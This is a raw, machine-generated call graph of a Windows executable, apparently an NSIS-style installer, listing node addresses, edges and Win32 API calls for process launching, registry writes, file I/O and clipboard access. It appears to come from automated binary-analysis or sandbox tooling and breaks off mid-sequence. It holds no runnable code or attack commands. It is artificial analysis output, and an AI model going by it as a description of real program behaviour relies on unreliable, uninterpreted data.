4308 405df0 WriteFile 4296->4308 4299->4278 4300->4284 4302 405ddf 4301->4302 4302->4287 4303 405ca3 lstrlenA 4302->4303 4304 405ce4 lstrlenA 4303->4304 4305 405cec 4304->4305 4306 405cbd lstrcmpiA 4304->4306 4305->4292 4305->4293 4306->4305 4307 405cdb CharNextA 4306->4307 4307->4304 4309 405e0e GlobalFree 4308->4309 4309->4287 4310 4015c1 4311 402c37 17 API calls 4310->4311 4312 4015c8 4311->4312 4313 405bc8 4 API calls 4312->4313 4326 4015d1 4313->4326 4314 401631 4316 401663 4314->4316 4317 401636 4314->4317 4315 405b4a CharNextW 4315->4326 4320 401423 24 API calls 4316->4320 4337 401423 4317->4337 4323 40165b 4320->4323 4325 40164a SetCurrentDirectoryW 4325->4323 4326->4314 4326->4315 4327 401617 GetFileAttributesW 4326->4327 4329 405819 4326->4329 4332 40577f CreateDirectoryW 4326->4332 4341 4057fc CreateDirectoryW 4326->4341 4327->4326 4344 406626 GetModuleHandleA 4329->4344 4333 4057d0 GetLastError 4332->4333 4334 4057cc 4332->4334 4333->4334 4335 4057df SetFileSecurityW 4333->4335 4334->4326 4335->4334 4336 4057f5 GetLastError 4335->4336 4336->4334 4338 4052b0 24 API calls 4337->4338 4339 401431 4338->4339 4340 40624c lstrcpynW 4339->4340 4340->4325 4342 405810 GetLastError 4341->4342 4343 40580c 4341->4343 4342->4343 4343->4326 4345 406642 4344->4345 4346 40664c GetProcAddress 4344->4346 4350 4065b6 GetSystemDirectoryW 4345->4350 4348 405820 4346->4348 4348->4326 4349 406648 4349->4346 4349->4348 4352 4065d8 wsprintfW LoadLibraryExW 4350->4352 4352->4349 4353 401e43 4361 402c15 4353->4361 4355 401e49 4356 402c15 17 API calls 4355->4356 4357 401e55 4356->4357 4358 401e61 ShowWindow 4357->4358 4359 401e6c EnableWindow 4357->4359 4360 402abf 4358->4360 4359->4360 4362 40626e 17 API calls 4361->4362 4363 402c2a 4362->4363 4363->4355 4368 402644 4369 402c15 17 API calls 4368->4369 4377 402653 4369->4377 4370 402790 4371 40269d ReadFile 4371->4370 4371->4377 4372 402736 4372->4370 4372->4377 4382 405e1f SetFilePointer 4372->4382 4373 405dc1 ReadFile 4373->4377 4375 402792 4391 406193 wsprintfW 4375->4391 4376 4026dd MultiByteToWideChar 4376->4377 4377->4370 4377->4371 4377->4372 4377->4373 4377->4375 4377->4376 4379 402703 SetFilePointer MultiByteToWideChar 4377->4379 4380 4027a3 4377->4380 4379->4377 4380->4370 4381 4027c4 SetFilePointer 4380->4381 4381->4370 4383 405e3b 4382->4383 4384 405e57 4382->4384 4385 405dc1 ReadFile 4383->4385 4384->4372 4386 405e47 4385->4386 4386->4384 4387 405e60 SetFilePointer 4386->4387 4388 405e88 SetFilePointer 4386->4388 4387->4388 4389 405e6b 4387->4389 4388->4384 4390 405df0 WriteFile 4389->4390 4390->4384 4391->4370 5169 402348 5170 402c37 17 API calls 5169->5170 5171 402357 5170->5171 5172 402c37 17 API calls 5171->5172 5173 402360 5172->5173 5174 402c37 17 API calls 5173->5174 5175 40236a GetPrivateProfileStringW 5174->5175 5186 4016cc 5187 402c37 17 API calls 5186->5187 5188 4016d2 GetFullPathNameW 5187->5188 5190 4016ec 5188->5190 5195 40170e 5188->5195 5189 401723 GetShortPathNameW 5191 402abf 5189->5191 5192 40658f 2 API calls 5190->5192 5190->5195 5193 4016fe 5192->5193 5193->5195 5196 40624c lstrcpynW 5193->5196 5195->5189 5195->5191 5196->5195 5197 401b4d 5198 402c37 17 API calls 5197->5198 5199 401b54 5198->5199 5200 402c15 17 API calls 5199->5200 5201 401b5d wsprintfW 5200->5201 5202 402abf 5201->5202 5203 401f52 5204 402c37 17 API calls 5203->5204 5205 401f59 5204->5205 5206 40658f 2 API calls 5205->5206 5207 401f5f 5206->5207 5209 401f70 5207->5209 5210 406193 wsprintfW 5207->5210 5210->5209 5211 402253 5212 402c37 17 API calls 5211->5212 5213 402259 5212->5213 5214 402c37 17 API calls 5213->5214 5215 402262 5214->5215 5216 402c37 17 API calls 5215->5216 5217 40226b 5216->5217 5218 40658f 2 API calls 5217->5218 5219 402274 5218->5219 5220 402285 lstrlenW lstrlenW 5219->5220 5224 402278 5219->5224 5222 4052b0 24 API calls 5220->5222 5221 4052b0 24 API calls 5225 402280 5221->5225 5223 4022c3 SHFileOperationW 5222->5223 5223->5224 5223->5225 5224->5221 5226 401956 5227 402c37 17 API calls 5226->5227 5228 40195d lstrlenW 5227->5228 5229 40258c 5228->5229 5230 406956 5231 4067da 5230->5231 5232 407145 5231->5232 5233 406864 GlobalAlloc 5231->5233 5234 40685b GlobalFree 5231->5234 5235 4068d2 GlobalFree 5231->5235 5236 4068db GlobalAlloc 5231->5236 5233->5231 5233->5232 5234->5233 5235->5236 5236->5231 5236->5232 4873 4014d7 4874 402c15 17 API calls 4873->4874 4875 4014dd Sleep 4874->4875 4877 402abf 4875->4877 5237 401d57 GetDlgItem GetClientRect 5238 402c37 17 API calls 5237->5238 5239 401d89 LoadImageW SendMessageW 5238->5239 5240 401da7 DeleteObject 5239->5240 5241 402abf 5239->5241 5240->5241 5242 4022d7 5243 4022f1 5242->5243 5244 4022de 5242->5244 5245 40626e 17 API calls 5244->5245 5246 4022eb 5245->5246 5247 4058ae MessageBoxIndirectW 5246->5247 5247->5243 5248 402dd7 5249 402de9 SetTimer 5248->5249 5251 402e02 5248->5251 5249->5251 5250 402e57 5251->5250 5252 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5251->5252 5252->5250 4878 40175c 4879 402c37 17 API calls 4878->4879 4880 401763 4879->4880 4884 405d6d 4880->4884 4882 40176a 4883 405d6d 2 API calls 4882->4883 4883->4882 4885 405d7a GetTickCount GetTempFileNameW 4884->4885 4886 405db0 4885->4886 4887 405db4 4885->4887 4886->4885 4886->4887 4887->4882 5130 4023de 5131 402c37 17 API calls 5130->5131 5132 4023f0 5131->5132 5133 402c37 17 API calls 5132->5133 5134 4023fa 5133->5134 5147 402cc7 5134->5147 5137 402885 5138 402432 5140 40243e 5138->5140 5142 402c15 17 API calls 5138->5142 5139 402c37 17 API calls 5141 402428 lstrlenW 5139->5141 5143 40245d RegSetValueExW 5140->5143 5144 4030fa 35 API calls 5140->5144 5141->5138 5142->5140 5145 402473 RegCloseKey 5143->5145 5144->5143 5145->5137 5148 402ce2 5147->5148 5151 4060e7 5148->5151 5152 4060f6 5151->5152 5153 406101 RegCreateKeyExW 5152->5153 5154 40240a 5152->5154 5153->5154 5154->5137 5154->5138 5154->5139 5260 402862 5261 402c37 17 API calls 5260->5261 5262 402869 FindFirstFileW 5261->5262 5263 402891 5262->5263 5266 40287c 5262->5266 5268 406193 wsprintfW 5263->5268 5265 40289a 5269 40624c lstrcpynW 5265->5269 5268->5265 5269->5266 5270 401563 5271 402a65 5270->5271 5274 406193 wsprintfW 5271->5274 5273 402a6a 5274->5273 5275 401968 5276 402c15 17 API calls 5275->5276 5277 40196f 5276->5277 5278 402c15 17 API calls 5277->5278 5279 40197c 5278->5279 5280 402c37 17 API calls 5279->5280 5281 401993 lstrlenW 5280->5281 5283 4019a4 5281->5283 5282 4019e5 5283->5282 5287 40624c lstrcpynW 5283->5287 5285 4019d5 5285->5282 5286 4019da lstrlenW 5285->5286 5286->5282 5287->5285 4541 4027e9 4542 4027f0 4541->4542 4545 402a6a 4541->4545 4543 402c15 17 API calls 4542->4543 4544 4027f7 4543->4544 4546 402806 SetFilePointer 4544->4546 4546->4545 4547 402816 4546->4547 4549 406193 wsprintfW 4547->4549 4549->4545 5288 404669 5289 404679 5288->5289 5290 40469f 5288->5290 5291 4041e1 18 API calls 5289->5291 5292 404248 8 API calls 5290->5292 5293 404686 SetDlgItemTextW 5291->5293 5294 4046ab 5292->5294 5293->5290 5295 100018a9 5296 100018cc 5295->5296 5297 100018ff GlobalFree 5296->5297 5298 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5296->5298 5297->5298 5299 10001272 2 API calls 5298->5299 5300 10001a87 GlobalFree GlobalFree 5299->5300 5301 40166a 5302 402c37 17 API calls 5301->5302 5303 401670 5302->5303 5304 40658f 2 API calls 5303->5304 5305 401676 5304->5305 5306 401ced 5307 402c15 17 API calls 5306->5307 5308 401cf3 IsWindow 5307->5308 5309 401a20 5308->5309 4728 40176f 4729 402c37 17 API calls 4728->4729 4730 401776 4729->4730 4731 401796 4730->4731 4732 40179e 4730->4732 4788 40624c lstrcpynW 4731->4788 4789 40624c lstrcpynW 4732->4789 4735 40179c 4739 4064e0 5 API calls 4735->4739 4736 4017a9 4737 405b1d 3 API calls 4736->4737 4738 4017af lstrcatW 4737->4738 4738->4735 4750 4017bb 4739->4750 4740 40658f 2 API calls 4740->4750 4741 405d19 2 API calls 4741->4750 4743 4017cd CompareFileTime 4743->4750 4744 40188d 4745 4052b0 24 API calls 4744->4745 4747 401897 4745->4747 4746 40624c lstrcpynW 4746->4750 4767 4030fa 4747->4767 4748 4052b0 24 API calls 4749 401879 4748->4749 4750->4740 4750->4741 4750->4743 4750->4744 4750->4746 4754 40626e 17 API calls 4750->4754 4765 401864 4750->4765 4766 405d3e GetFileAttributesW CreateFileW 4750->4766 4790 4058ae 4750->4790 4753 4018be SetFileTime 4755 4018d0 FindCloseChangeNotification 4753->4755 4754->4750 4755->4749 4756 4018e1 4755->4756 4757 4018e6 4756->4757 4758 4018f9 4756->4758 4760 40626e 17 API calls 4757->4760 4759 40626e 17 API calls 4758->4759 4761 401901 4759->4761 4763 4018ee lstrcatW 4760->4763 4764 4058ae MessageBoxIndirectW 4761->4764 4763->4761 4764->4749 4765->4748 4765->4749 4766->4750 4768 403113 4767->4768 4769 40313e 4768->4769 4804 4032f5 SetFilePointer 4768->4804 4794 4032df 4769->4794 4773 4018aa 4773->4753 4773->4755 4774 40315b GetTickCount 4780 40316e 4774->4780 4775 40327f 4776 403283 4775->4776 4781 40329b 4775->4781 4777 4032df ReadFile 4776->4777 4777->4773 4778 4032df ReadFile 4778->4781 4779 4032df ReadFile 4779->4780 4780->4773 4780->4779 4784 4031d4 GetTickCount 4780->4784 4785 4031fd MulDiv wsprintfW 4780->4785 4787 405df0 WriteFile 4780->4787 4797 4067a7 4780->4797 4781->4773 4781->4778 4782 405df0 WriteFile 4781->4782 4782->4781 4784->4780 4786 4052b0 24 API calls 4785->4786 4786->4780 4787->4780 4788->4735 4789->4736 4791 4058c3 4790->4791 4792 40590f 4791->4792 4793 4058d7 MessageBoxIndirectW 4791->4793 4792->4750 4793->4792 4795 405dc1 ReadFile 4794->4795 4796 403149 4795->4796 4796->4773 4796->4774 4796->4775 4798 4067cc 4797->4798 4799 4067d4 4797->4799 4798->4780 4799->4798 4800 406864 GlobalAlloc 4799->4800 4801 40685b GlobalFree 4799->4801 4802 4068d2 GlobalFree 4799->4802 4803 4068db GlobalAlloc 4799->4803 4800->4798 4800->4799 4801->4800 4802->4803 4803->4798 4803->4799 4804->4769 4805 4053ef 4806 405410 GetDlgItem GetDlgItem GetDlgItem 4805->4806 4807 405599 4805->4807 4851 404216 SendMessageW 4806->4851 4809 4055a2 GetDlgItem CreateThread FindCloseChangeNotification 4807->4809 4810 4055ca 4807->4810 4809->4810 4854 405383 OleInitialize 4809->4854 4812 4055f5 4810->4812 4814 4055e1 ShowWindow ShowWindow 4810->4814 4815 40561a 4810->4815 4811 405480 4819 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4811->4819 4813 405601 4812->4813 4820 405655 4812->4820 4816 405609 4813->4816 4817 40562f ShowWindow 4813->4817 4853 404216 SendMessageW 4814->4853 4818 404248 8 API calls 4815->4818 4822 4041ba SendMessageW 4816->4822 4824 405641 4817->4824 4825 40564f 4817->4825 4823 405628 4818->4823 4826 4054f5 4819->4826 4827 4054d9 SendMessageW SendMessageW 4819->4827 4820->4815 4828 405663 SendMessageW 4820->4828 4822->4815 4829 4052b0 24 API calls 4824->4829 4830 4041ba SendMessageW 4825->4830 4831 405508 4826->4831 4832 4054fa SendMessageW 4826->4832 4827->4826 4828->4823 4833 40567c CreatePopupMenu 4828->4833 4829->4825 4830->4820 4834 4041e1 18 API calls 4831->4834 4832->4831 4835 40626e 17 API calls 4833->4835 4837 405518 4834->4837 4836 40568c AppendMenuW 4835->4836 4838 4056a9 GetWindowRect 4836->4838 4839 4056bc TrackPopupMenu 4836->4839 4840 405521 ShowWindow 4837->4840 4841 405555 GetDlgItem SendMessageW 4837->4841 4838->4839 4839->4823 4842 4056d7 4839->4842 4843 405544 4840->4843 4844 405537 ShowWindow 4840->4844 4841->4823 4845 40557c SendMessageW SendMessageW 4841->4845 4846 4056f3 SendMessageW 4842->4846 4852 404216 SendMessageW 4843->4852 4844->4843 4845->4823 4846->4846 4847 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4846->4847 4849 405735 SendMessageW 4847->4849 4849->4849 4850 40575e GlobalUnlock SetClipboardData CloseClipboard 4849->4850 4850->4823 4851->4811 4852->4841 4853->4812 4855 40422d SendMessageW 4854->4855 4857 4053a6 4855->4857 4856 40422d SendMessageW 4858 4053df OleUninitialize 4856->4858 4859 401389 2 API calls 4857->4859 4860 4053cd 4857->4860 4859->4857 4860->4856 5310 402570 5311 402c37 17 API calls 5310->5311 5312 402577 5311->5312 5315 405d3e GetFileAttributesW CreateFileW 5312->5315 5314 402583 5315->5314 5316 401b71 5317 401bc2 5316->5317 5318 401b7e 5316->5318 5319 401bc7 5317->5319 5320 401bec GlobalAlloc 5317->5320 5321 401c07 5318->5321 5326 401b95 5318->5326 5330 4022f1 5319->5330 5337 40624c lstrcpynW 5319->5337 5323 40626e 17 API calls 5320->5323 5322 40626e 17 API calls 5321->5322 5321->5330 5324 4022eb 5322->5324 5323->5321 5329 4058ae MessageBoxIndirectW 5324->5329 5335 40624c lstrcpynW 5326->5335 5327 401bd9 GlobalFree 5327->5330 5329->5330 5331 401ba4 5336 40624c lstrcpynW 5331->5336 5333 401bb3 5338 40624c lstrcpynW 5333->5338 5335->5331 5336->5333 5337->5327 5338->5330 4861 4024f2 4862 402c77 17 API calls 4861->4862 4863 4024fc 4862->4863 4864 402c15 17 API calls 4863->4864 4865 402505 4864->4865 4866 402521 RegEnumKeyW 4865->4866 4867 40252d RegEnumValueW 4865->4867 4870 402885 4865->4870 4868 402549 RegCloseKey 4866->4868 4867->4868 4869 402542 4867->4869 4868->4870 4869->4868 5339 401a72 5340 402c15 17 API calls 5339->5340 5341 401a78 5340->5341 5342 402c15 17 API calls 5341->5342 5343 401a20 5342->5343 5344 401573 5345 401583 ShowWindow 5344->5345 5346 40158c 5344->5346 5345->5346 5347 40159a ShowWindow 5346->5347 5348 402abf 5346->5348 5347->5348 4872 405874 ShellExecuteExW 5349 4042f5 lstrcpynW lstrlenW 5350 4014f5 SetForegroundWindow 5351 402abf 5350->5351 5359 100016b6 5360 100016e5 5359->5360 5361 10001b18 20 API calls 5360->5361 5362 100016ec 5361->5362 5363 100016f3 5362->5363 5364 100016ff 5362->5364 5367 10001272 2 API calls 5363->5367 5365 10001726 5364->5365 5366 10001709 5364->5366 5370 10001750 5365->5370 5371 1000172c 5365->5371 5369 1000153d 3 API calls 5366->5369 5368 100016fd 5367->5368 5373 1000170e 5369->5373 5372 1000153d 3 API calls 5370->5372 5374 100015b4 3 API calls 5371->5374 5372->5368 5375 100015b4 3 API calls 5373->5375 5376 10001731 5374->5376 5377 10001714 5375->5377 5378 10001272 2 API calls 5376->5378 5379 10001272 2 API calls 5377->5379 5380 10001737 GlobalFree 5378->5380 5381 1000171a GlobalFree 5379->5381 5380->5368 5382 1000174b GlobalFree 5380->5382 5381->5368 5382->5368 5383 401e77 5384 402c37 17 API calls 5383->5384 5385 401e7d 5384->5385 5386 402c37 17 API calls 5385->5386 5387 401e86 5386->5387 5388 402c37 17 API calls 5387->5388 5389 401e8f 5388->5389 5390 402c37 17 API calls 5389->5390 5391 401e98 5390->5391 5392 401423 24 API calls 5391->5392 5393 401e9f 5392->5393 5400 405874 ShellExecuteExW 5393->5400 5395 401ee1 5396 4066d7 5 API calls 5395->5396 5397 402885 5395->5397 5398 401efb CloseHandle 5396->5398 5398->5397 5400->5395 5401 10002238 5402 10002296 5401->5402 5404 100022cc 5401->5404 5403 100022a8 GlobalAlloc 5402->5403 5402->5404 5403->5402 5405 40167b 5406 402c37 17 API calls 5405->5406 5407 401682 5406->5407 5408 402c37 17 API calls 5407->5408 5409 40168b 5408->5409 5410 402c37 17 API calls 5409->5410 5411 401694 MoveFileW 5410->5411 5412 4016a7 5411->5412 5418 4016a0 5411->5418 5413 40658f 2 API calls 5412->5413 5415 40224a 5412->5415 5416 4016b6 5413->5416 5414 401423 24 API calls 5414->5415 5416->5415 5417 406012 36 API calls 5416->5417 5417->5418 5418->5414 5419 1000103d 5420 1000101b 5 API calls 5419->5420 5421 10001056 5420->5421 5118 40247e 5119 402c77 17 API calls 5118->5119 5120 402488 5119->5120 5121 402c37 17 API calls 5120->5121 5122 402491 5121->5122 5123 40249c RegQueryValueExW 5122->5123 5127 402885 5122->5127 5124 4024bc 5123->5124 5125 4024c2 RegCloseKey 5123->5125 5124->5125 5129 406193 wsprintfW 5124->5129 5125->5127 5129->5125 5422 40437e 5423 404396 5422->5423 5427 4044b0 5422->5427 5428 4041e1 18 API calls 5423->5428 5424 40451a 5425 4045e4 5424->5425 5426 404524 GetDlgItem 5424->5426 5433 404248 8 API calls 5425->5433 5429 4045a5 5426->5429 5430 40453e 5426->5430 5427->5424 5427->5425 5431 4044eb GetDlgItem SendMessageW 5427->5431 5432 4043fd 5428->5432 5429->5425 5434 4045b7 5429->5434 5430->5429 5438 404564 SendMessageW LoadCursorW SetCursor 5430->5438 5455 404203 KiUserCallbackDispatcher 5431->5455 5436 4041e1 18 API calls 5432->5436 5437 4045df 5433->5437 5439 4045cd 5434->5439 5440 4045bd SendMessageW 5434->5440 5442 40440a CheckDlgButton 5436->5442 5459 40462d 5438->5459 5439->5437 5444 4045d3 SendMessageW 5439->5444 5440->5439 5441 404515 5456 404609 5441->5456 5453 404203 KiUserCallbackDispatcher 5442->5453 5444->5437 5448 404428 GetDlgItem 5454 404216 SendMessageW 5448->5454 5450 40443e SendMessageW 5451 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5450->5451 5452 40445b GetSysColor 5450->5452 5451->5437 5452->5451 5453->5448 5454->5450 5455->5441 5457 404617 5456->5457 5458 40461c SendMessageW 5456->5458 5457->5458 5458->5424 5462 405874 ShellExecuteExW 5459->5462 5461 404593 LoadCursorW SetCursor 5461->5429 5462->5461 5463 4020fe 5464 402c37 17 API calls 5463->5464 5465 402105 5464->5465 5466 402c37 17 API calls 5465->5466 5467 40210f 5466->5467 5468 402c37 17 API calls 5467->5468 5469 402119 5468->5469 5470 402c37 17 API calls 5469->5470 5471 402123 5470->5471 5472 402c37 17 API calls 5471->5472 5473 40212d 5472->5473 5474 40216c CoCreateInstance 5473->5474 5475 402c37 17 API calls 5473->5475 5478 40218b 5474->5478 5475->5474 5476 401423 24 API calls 5477 40224a 5476->5477 5478->5476 5478->5477 5479 4019ff 5480 402c37 17 API calls 5479->5480 5481 401a06 5480->5481 5482 402c37 17 API calls 5481->5482 5483 401a0f 5482->5483 5484 401a16 lstrcmpiW 5483->5484 5485 401a28 lstrcmpW 5483->5485 5486 401a1c 5484->5486 5485->5486 4092 401f00 4107 402c37 4092->4107 4099 401f39 CloseHandle 4102 402885 4099->4102 4103 401f2b 4104 401f30 4103->4104 4105 401f3b 4103->4105 4132 406193 wsprintfW 4104->4132 4105->4099 4108 402c43 4107->4108 4133 40626e 4108->4133 4111 401f06 4113 4052b0 4111->4113 4115 4052cb 4113->4115 4123 401f10 4113->4123 4114 4052e7 lstrlenW 4117 405310 4114->4117 4118 4052f5 lstrlenW 4114->4118 4115->4114 4116 40626e 17 API calls 4115->4116 4116->4114 4120 405323 4117->4120 4121 405316 SetWindowTextW 4117->4121 4119 405307 lstrcatW 4118->4119 4118->4123 4119->4117 4122 405329 SendMessageW SendMessageW SendMessageW 4120->4122 4120->4123 4121->4120 4122->4123 4124 405831 CreateProcessW 4123->4124 4125 401f16 4124->4125 4126 405864 CloseHandle 4124->4126 4125->4099 4125->4102 4127 4066d7 WaitForSingleObject 4125->4127 4126->4125 4128 4066f1 4127->4128 4129 406703 GetExitCodeProcess 4128->4129 4175 406662 4128->4175 4129->4103 4132->4099 4146 40627b 4133->4146 4134 4064c6 4135 402c64 4134->4135 4166 40624c lstrcpynW 4134->4166 4135->4111 4150 4064e0 4135->4150 4137 406494 lstrlenW 4137->4146 4140 40626e 10 API calls 4140->4137 4142 4063a9 GetSystemDirectoryW 4142->4146 4143 4063bc GetWindowsDirectoryW 4143->4146 4144 4064e0 5 API calls 4144->4146 4145 4063f0 SHGetSpecialFolderLocation 4145->4146 4149 406408 SHGetPathFromIDListW CoTaskMemFree 4145->4149 4146->4134 4146->4137 4146->4140 4146->4142 4146->4143 4146->4144 4146->4145 4147 40626e 10 API calls 4146->4147 4148 406437 lstrcatW 4146->4148 4159 40611a 4146->4159 4164 406193 wsprintfW 4146->4164 4165 40624c lstrcpynW 4146->4165 4147->4146 4148->4146 4149->4146 4157 4064ed 4150->4157 4151 406563 4152 406568 CharPrevW 4151->4152 4154 406589 4151->4154 4152->4151 4153 406556 CharNextW 4153->4151 4153->4157 4154->4111 4156 406542 CharNextW 4156->4157 4157->4151 4157->4153 4157->4156 4158 406551 CharNextW 4157->4158 4171 405b4a 4157->4171 4158->4153 4167 4060b9 4159->4167 4162 40617e 4162->4146 4163 40614e RegQueryValueExW RegCloseKey 4163->4162 4164->4146 4165->4146 4166->4135 4168 4060c8 4167->4168 4169 4060d1 RegOpenKeyExW 4168->4169 4170 4060cc 4168->4170 4169->4170 4170->4162 4170->4163 4172 405b50 4171->4172 4173 405b66 4172->4173 4174 405b57 CharNextW 4172->4174 4173->4157 4174->4172 4176 40667f PeekMessageW 4175->4176 4177 406675 DispatchMessageW 4176->4177 4178 40668f WaitForSingleObject 4176->4178 4177->4176 4178->4128 5487 401000 5488 401037 BeginPaint GetClientRect 5487->5488 5489 40100c DefWindowProcW 5487->5489 5490 4010f3 5488->5490 5492 401179 5489->5492 5493 401073 CreateBrushIndirect FillRect DeleteObject 5490->5493 5494 4010fc 5490->5494 5493->5490 5495 401102 CreateFontIndirectW 5494->5495 5496 401167 EndPaint 5494->5496 5495->5496 5497 401112 6 API calls 5495->5497 5496->5492 5497->5496 5498 401503 5499 40150b 5498->5499 5501 40151e 5498->5501 5500 402c15 17 API calls 5499->5500 5500->5501 4392 402306 4393 40230e 4392->4393 4396 402314 4392->4396 4394 402c37 17 API calls 4393->4394 4394->4396 4395 402c37 17 API calls 4397 402322 4395->4397 4396->4395 4396->4397 4398 402c37 17 API calls 4397->4398 4400 402330 4397->4400 4398->4400 4399 402c37 17 API calls 4401 402339 WritePrivateProfileStringW 4399->4401 4400->4399 5502 404a06 5503 404a32 5502->5503 5504 404a16 5502->5504 5506 404a65 5503->5506 5507 404a38 SHGetPathFromIDListW 5503->5507 5513 405892 GetDlgItemTextW 5504->5513 5509 404a4f SendMessageW 5507->5509 5510 404a48 5507->5510 5508 404a23 SendMessageW 5508->5503 5509->5506 5511 40140b 2 API calls 5510->5511 5511->5509 5513->5508 5514 401f86 5515 402c37 17 API calls 5514->5515 5516 401f8d 5515->5516 5517 406626 5 API calls 5516->5517 5518 401f9c 5517->5518 5519 401fb8 GlobalAlloc 5518->5519 5520 402020 5518->5520 5519->5520 5521 401fcc 5519->5521 5522 406626 5 API calls 5521->5522 5523 401fd3 5522->5523 5524 406626 5 API calls 5523->5524 5525 401fdd 5524->5525 5525->5520 5529 406193 wsprintfW 5525->5529 5527 402012 5530 406193 wsprintfW 5527->5530 5529->5527 5530->5520 4402 403d08 4403 403d20 4402->4403 4404 403e5b 4402->4404 4403->4404 4405 403d2c 4403->4405 4406 403eac 4404->4406 4407 403e6c GetDlgItem GetDlgItem 4404->4407 4409 403d37 SetWindowPos 4405->4409 4410 403d4a 4405->4410 4408 403f06 4406->4408 4419 401389 2 API calls 4406->4419 4473 4041e1 4407->4473 4434 403e56 4408->4434 4479 40422d 4408->4479 4409->4410 4414 403d67 4410->4414 4415 403d4f ShowWindow 4410->4415 4412 403e96 KiUserCallbackDispatcher 4476 40140b 4412->4476 4417 403d89 4414->4417 4418 403d6f DestroyWindow 4414->4418 4415->4414 4420 403d8e SetWindowLongW 4417->4420 4421 403d9f 4417->4421 4472 40416a 4418->4472 4422 403ede 4419->4422 4420->4434 4424 403e48 4421->4424 4425 403dab GetDlgItem 4421->4425 4422->4408 4426 403ee2 SendMessageW 4422->4426 4423 40416c DestroyWindow EndDialog 4423->4472 4495 404248 4424->4495 4429 403ddb 4425->4429 4430 403dbe SendMessageW IsWindowEnabled 4425->4430 4426->4434 4427 40140b 2 API calls 4445 403f18 4427->4445 4428 40419b ShowWindow 4428->4434 4433 403de0 4429->4433 4435 403de8 4429->4435 4437 403e2f SendMessageW 4429->4437 4438 403dfb 4429->4438 4430->4429 4430->4434 4432 40626e 17 API calls 4432->4445 4492 4041ba 4433->4492 4435->4433 4435->4437 4437->4424 4440 403e03 4438->4440 4441 403e18 4438->4441 4439 403e16 4439->4424 4444 40140b 2 API calls 4440->4444 4443 40140b 2 API calls 4441->4443 4442 4041e1 18 API calls 4442->4445 4446 403e1f 4443->4446 4444->4433 4445->4423 4445->4427 4445->4432 4445->4434 4445->4442 4447 4041e1 18 API calls 4445->4447 4463 4040ac DestroyWindow 4445->4463 4446->4424 4446->4433 4448 403f93 GetDlgItem 4447->4448 4449 403fb0 ShowWindow KiUserCallbackDispatcher 4448->4449 4450 403fa8 4448->4450 4482 404203 KiUserCallbackDispatcher 4449->4482 4450->4449 4452 403fda EnableWindow 4457 403fee 4452->4457 4453 403ff3 GetSystemMenu EnableMenuItem SendMessageW 4454 404023 SendMessageW 4453->4454 4453->4457 4454->4457 4457->4453 4483 404216 SendMessageW 4457->4483 4484 403ce9 4457->4484 4487 40624c lstrcpynW 4457->4487 4459 404052 lstrlenW 4460 40626e 17 API calls 4459->4460 4461 404068 SetWindowTextW 4460->4461 4488 401389 4461->4488 4464 4040c6 CreateDialogParamW 4463->4464 4463->4472 4465 4040f9 4464->4465 4464->4472 4466 4041e1 18 API calls 4465->4466 4467 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4466->4467 4468 401389 2 API calls 4467->4468 4469 40414a 4468->4469 4469->4434 4470 404152 ShowWindow 4469->4470 4471 40422d SendMessageW 4470->4471 4471->4472 4472->4428 4472->4434 4474 40626e 17 API calls 4473->4474 4475 4041ec SetDlgItemTextW 4474->4475 4475->4412 4477 401389 2 API calls 4476->4477 4478 401420 4477->4478 4478->4406 4480 404245 4479->4480 4481 404236 SendMessageW 4479->4481 4480->4445 4481->4480 4482->4452 4483->4457 4485 40626e 17 API calls 4484->4485 4486 403cf7 SetWindowTextW 4485->4486 4486->4457 4487->4459 4490 401390 4488->4490 4489 4013fe 4489->4445 4490->4489 4491 4013cb MulDiv SendMessageW 4490->4491 4491->4490 4493 4041c1 4492->4493 4494 4041c7 SendMessageW 4492->4494 4493->4494 4494->4439 4496 404260 GetWindowLongW 4495->4496 4506 4042e9 4495->4506 4497 404271 4496->4497 4496->4506 4498 404280 GetSysColor 4497->4498 4499 404283 4497->4499 4498->4499 4500 404293 SetBkMode 4499->4500 4501 404289 SetTextColor 4499->4501 4502 4042b1 4500->4502 4503 4042ab GetSysColor 4500->4503 4501->4500 4504 4042c2 4502->4504 4505 4042b8 SetBkColor 4502->4505 4503->4502 4504->4506 4507 4042d5 DeleteObject 4504->4507 4508 4042dc CreateBrushIndirect 4504->4508 4505->4504 4506->4434 4507->4508 4508->4506 4509 402388 4510 402390 4509->4510 4511 4023bb 4509->4511 4521 402c77 4510->4521 4512 402c37 17 API calls 4511->4512 4514 4023c2 4512->4514 4526 402cf5 4514->4526 4517 4023a1 4519 402c37 17 API calls 4517->4519 4518 4023cf 4520 4023a8 RegDeleteValueW RegCloseKey 4519->4520 4520->4518 4522 402c37 17 API calls 4521->4522 4523 402c8e 4522->4523 4524 4060b9 RegOpenKeyExW 4523->4524 4525 402397 4524->4525 4525->4517 4525->4518 4528 402d0b 4526->4528 4527 402d21 4527->4518 4528->4527 4530 402d2a 4528->4530 4531 4060b9 RegOpenKeyExW 4530->4531 4533 402d58 4531->4533 4532 402d7e RegEnumKeyW 4532->4533 4534 402d95 RegCloseKey 4532->4534 4533->4532 4533->4534 4535 402db6 RegCloseKey 4533->4535 4537 402d2a 6 API calls 4533->4537 4540 402da9 4533->4540 4536 406626 5 API calls 4534->4536 4535->4540 4538 402da5 4536->4538 4537->4533 4539 402dc4 RegDeleteKeyW 4538->4539 4538->4540 4539->4540 4540->4527 5538 40190c 5539 401943 5538->5539 5540 402c37 17 API calls 5539->5540 5541 401948 5540->5541 5542 40595a 67 API calls 5541->5542 5543 401951 5542->5543 5551 401d0e 5552 402c15 17 API calls 5551->5552 5553 401d15 5552->5553 5554 402c15 17 API calls 5553->5554 5555 401d21 GetDlgItem 5554->5555 5556 40258c 5555->5556 5557 1000164f 5558 10001516 GlobalFree 5557->5558 5560 10001667 5558->5560 5559 100016ad GlobalFree 5560->5559 5561 10001682 5560->5561 5562 10001699 VirtualFree 5560->5562 5561->5559 5562->5559 5563 40190f 5564 402c37 17 API calls 5563->5564 5565 401916 5564->5565 5566 4058ae MessageBoxIndirectW 5565->5566 5567 40191f 5566->5567 5568 401491 5569 4052b0 24 API calls 5568->5569 5570 401498 5569->5570 5571 402592 5572 4025c1 5571->5572 5573 4025a6 5571->5573 5574 4025f5 5572->5574 5575 